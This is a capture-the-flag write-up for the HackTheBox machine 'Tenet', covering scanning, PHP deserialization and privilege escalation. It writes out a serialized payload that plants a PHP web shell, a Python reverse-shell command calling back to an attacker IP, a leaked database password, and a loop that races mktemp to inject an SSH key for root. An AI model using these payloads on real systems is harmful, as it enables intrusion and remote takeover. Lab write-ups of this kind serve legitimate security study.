CTF-Writeups/HackTheBox/Tenet.md

HackTheBox-Tenet

Rustscan

rustscan -a 10.10.10.223 -- -A -sC -sV                                                             
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                  
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                      
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |             
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                                                            
The Modern Day Port Scanner.                              
________________________________________                                                                                                            
: https://discord.gg/GFrQsGy           :                                                                                                            
: https://github.com/RustScan/RustScan :                                                                                                            
 --------------------------------------
Nmap? More like slowmap.🐢                                                                                                                          
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                     
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.10.223:22                 
Open 10.10.10.223:80                 

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                    
| ssh-hostkey:       
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)      
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDA4SymrtoAxhSnm6gIUPFcp1VhjoVue64X4LIvoYolM5BQPblUj2aezdd9aRI227jVzfkOD4Kg3OW2yT5uxFljn7q/Mh5/muGvUNA+nNO6pC
C0tZPoPEwMT+QvR3XyQXxbP6povh4GISBySLw/DFQoG3A2t80Giyq5Q7P+1LH1f/m63DyiNXOPS8fNBPz59BDEgC9jJ5Lu2DTu8ko1xE/85MLYyBKRSFHEkqagRXIYUwVQASHgo3OoJ+VAcBTJZH
1TmXDc4c6W0hIPpQW5dyvj3tdjKjlIkw6dH2at9NL3gnTP5xnsoiOu0dyofm2L5fvBpzvOzUnQ2rps2wANTZwZ
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)   
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLMM1BQpjspHo9teJwTFZntx+nxj8D51/Nu0nI3atUpyPg/bXlNYi26boH8zYTrC6fWepgaG2G
ZigAqxN4yuwgo=                                                            
|   256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMQeNqzXOE6aVR3ulHIyB8EGf1ZaUSCNuou5+cgmNXvt
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:                      
|_  Supported Methods: POST OPTIONS HEAD GET                              
|_http-server-header: Apache/2.4.29 (Ubuntu)                              
|_http-title: Apache2 Ubuntu Default Page: It works                       
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port     

PORT 80 (HTTP)

Visting the web page it shows default apache web page

Running dirsearch

Now this doesn't loads css so looking at the source it shows the there's a domain

tenet.htb

Adding this to /etc/hosts file

We can see some posts on the main page

We’re looking for beta testers of our new time-management software, ‘Rotas’

‘Rotas’ will hopefully be coming to market late 2021, pending rigorous QA from our developers, and you!

For more information regarding opting-in, watch this space.

Published December 16, 2020 By [protagonist]

We’re moving our data over from a flat file structure to something a bit more substantial. Please bear with us whilst we get one of our devs on the migration, which shouldn’t take too long.

Thank you for your patience

Published December 16, 2020 By [protagonist]

This post had a comment

[neil]

[December 16, 2020 at 2:53 pm]

did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!

So we have some information that there are two users neil and protagonist also there's a php file and backup folder

We could have alternatively done this through wpscan

I tried bruteforcing through wpscan but it didn't found any password

Going back to that apache default page I tried to include sator.php and got something

If we focus on the comment which was made on the post "the sator php file and the backup"

We will get a backup file for staor.php

<?php

class DatabaseExport
{
	public $user_file = 'users.txt';
	public $data = '';

	public function update_db()
	{
		echo '[+] Grabbing users from text file <br>';
		$this-> data = 'Success';
	}


	public function __destruct()
	{
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
		echo '[] Database updated <br>';
	//	echo 'Gotta get this working properly...';
	}
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

PHP Deserlization attack

We can see here that there's a class DatabaseExport in which there are two public variables user_file and data and in this class there's a public function called update_db() which will set the data variable to "sucess" which is just a text as you can see from the sator.php show on the web browser at the end there's a magic function __destruct() which will be automatcially called when an object is destroyed , there the user_file will be made with the contents from data and will put in the web directory which means users.txt will be created in the web directory having the data "success".

At the end we can the GET parameter arepo , now here exists a vulnerability which is known as** PHP Deserilization**

So to exploit this we have to modify the class variables in this case user_file and data and seriliaze it , once we get the serliazed string we pass it to arepo paramter.

After running it we will get a php serialized object

But we need to pass this to GET paramter in a url encoded form so I used cyberchef to do that

And then paste into the GET parameter

http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:%7Bs:9:%22user_file%22;s:9:%22shell.php%22;s:4:%22data%22;s:29:%22%3C?php%20system($_GET%5B%22cmd%22%5D);?%3E%22;%7D

We can see the message "Database updated" so let's see if shell.php was made on the web directory or not.

And we have a rce, cool !

Python3 is installed so we can get a reverse shell through it

http://10.10.10.223/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Stabilize the shell

Let's check the cron jobs

Open ports

Escalating to user

We see mysql running on localhost so we can try to find creds for mysql and since wordpress is hosted the creds are in wp-config.php file

/** MySQL database username */                                                                                                                      
define( 'DB_USER', 'neil' );                     
/** MySQL database password */                                                                                                                      
define( 'DB_PASSWORD', 'Opera2112' );

/** MySQL hostname */                                                                                                                               
define( 'DB_HOST', 'localhost' );                                                                                                                   
                                                            

The db user is neil so this is interesting as neil is also the user on the linux machine so let's try this password

Privilege Escalation

Doing sudo -l we can see what we run as sudo

Reading the contents of the bash script

Here these functions are not that interesting , if we go to the bottom

We can see a function addkey() in which a temporary file is being made with command mktemp

If we run this command on our local machine to see what file name it generates we can see that the file name it's pretty unique everytime this command runs

On the target machine it also generates a random name

In the script that file is being removed but that's the file need to put in our ssh public key so we need to run a loop in which we try to put our public key in every file that starts with ssh so we have to utilize wildcard here ( * )

So our one liner script should look like this

while true; do var=$(ls /tmp |grep ssh);echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzKK/Hru6t4lA0tu4CX8E3BzkM8Bl7cFxyheVBHZS+flyqq
/sZuRfPHCQE2LNL5IgRfHDljFO4MuiYJgrMr8jCA+stDBxGAhCiRZ4UmZ7OYn1abGGOmtUyaCYvJp3pizvcyVIJsNBQBSk1JETfopgKCydtXfbXYF8kukjM29AVbIoD99UAmo8Qm1RDv+cguO+0q
Tg1vHMErURIyM/P3fhNakGL2F1/rENpvqB7EK06N6KYLujCf9Y87slTCU33gHoo5iG5mX5JFi2pBhWJnOQECjaeEsTjvKKvgIX7wy14b3I4b7fLstsXg69CCE9KF5Zr1uWYP0JGG1pB0OrDH4LPj
MRxDALCKMnA4F8OrSmTzfgWJ9LhxxFHh73ExsfGJYypBuSOxh+4UBSuF5znPbJo315Qd05LEcpCAv623vqjsUDQUEMeJVz0NiWkGCuJIxt+YTGinB9hDj58seHsI4yMZe5HtY5cQJLR09/fVoGPi
ebD/lFk68jQFonJs73NlPE= root@kali' | tee $var ;done

We are running a while loop infinite number of times and in there we have a variable which is grabbing the name of the random generated ssh file , next we are printing our public ssh key and piping it to that file and logging it with the help of tee

So first I will run the enableSSH script

Then will run my one liner bash script

After running it for some time and terminated both the scripts and in the /tmp folder you will see those randomly generated ssh file , some of them will have no content as the temp file gets deleted.

Try to ssh in the target machine using ssh private key